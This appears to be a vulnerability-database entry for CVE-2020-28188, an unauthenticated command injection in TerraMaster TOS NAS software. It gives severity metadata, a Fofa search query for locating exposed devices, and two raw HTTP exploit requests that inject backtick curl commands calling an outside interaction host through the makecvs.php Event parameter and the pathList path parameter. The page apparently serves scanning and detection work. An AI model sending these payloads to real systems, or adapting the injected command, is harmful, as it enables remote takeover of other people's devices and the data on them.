| Title | TerraMaster TOS - Unauthenticated Remote Command Execution |
|---|---|
| Author | gy741 |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. |
| Remediation | Apply the latest security patch or update provided by TerraMaster to fix the vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.9344 |
| CVE ID | CVE-2020-28188 |
| CWE ID | CWE-78 |
| Fofa Query | "terramaster" && header="tos" |
| Tags | cve2020 cve packetstorm terramaster rce oast mirai unauth terra-master vkev vuln |
TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.
GET /include/makecvs.php?Event=%60curl+http%3a//d5jortple0o33059j4p06k6kmcoagdw4r.oast.site+-H+'User-Agent%3a+XLHmcK'%60 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d5jortple0o33059j4p04q9crz4mb1h7m.oast.site+-H+'User-Agent%3a+XLHmcK'%60 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/129.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-28188.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-28188.pcap
N/AN/A